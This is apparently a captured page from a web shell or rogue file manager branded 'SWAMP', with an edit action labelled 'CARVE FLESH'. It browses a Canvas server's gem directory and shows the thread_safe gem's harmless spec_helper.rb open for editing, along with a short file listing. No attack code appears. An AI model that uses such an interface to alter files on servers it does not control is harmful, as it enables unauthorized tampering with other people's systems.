░▒▓████████████████████████████████▓▒░ ░▒▓█ ▓▒░ ░▒▓█ ~ S W A M P ~ ▓▒░ ░▒▓█ ▓▒░ ░▒▓████████████████████████████████▓▒░
pplmvsvm
LOCATION:
/var/www/canvas/vendor/bundle/ruby/3.1.0/gems/thread_safe-0.3.6/spec
☗ ROOT
↻ REFRESH
✎ CARVE FLESH
EDITING: spec_helper.rb
require 'simplecov' require 'coveralls' require 'logger' SimpleCov.formatter = SimpleCov::Formatter::MultiFormatter[ SimpleCov::Formatter::HTMLFormatter, Coveralls::SimpleCov::Formatter ] SimpleCov.start do project_name 'thread_safe' add_filter '/coverage/' add_filter '/pkg/' add_filter '/spec/' add_filter '/tasks/' add_filter '/yard-template/' end $VERBOSE = nil # suppress our deprecation warnings require 'thread_safe' logger = Logger.new($stderr) logger.level = Logger::WARN # import all the support files Dir[File.join(File.dirname(__FILE__), 'support/**/*.rb')].each { |f| require File.expand_path(f) } RSpec.configure do |config| #config.raise_errors_for_deprecations! config.order = 'random' end
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📁 src/
DIR
—
2023-09-24 03:46
📁 support/
DIR
—
2023-09-24 03:46
📁 thread_safe/
DIR
—
2023-09-24 03:46
📄 .gitignore
GITIGNORE
0 B
2023-09-24 03:46
EDIT
📄 spec_helper.rb
RB
779 B
2023-09-24 03:46
EDIT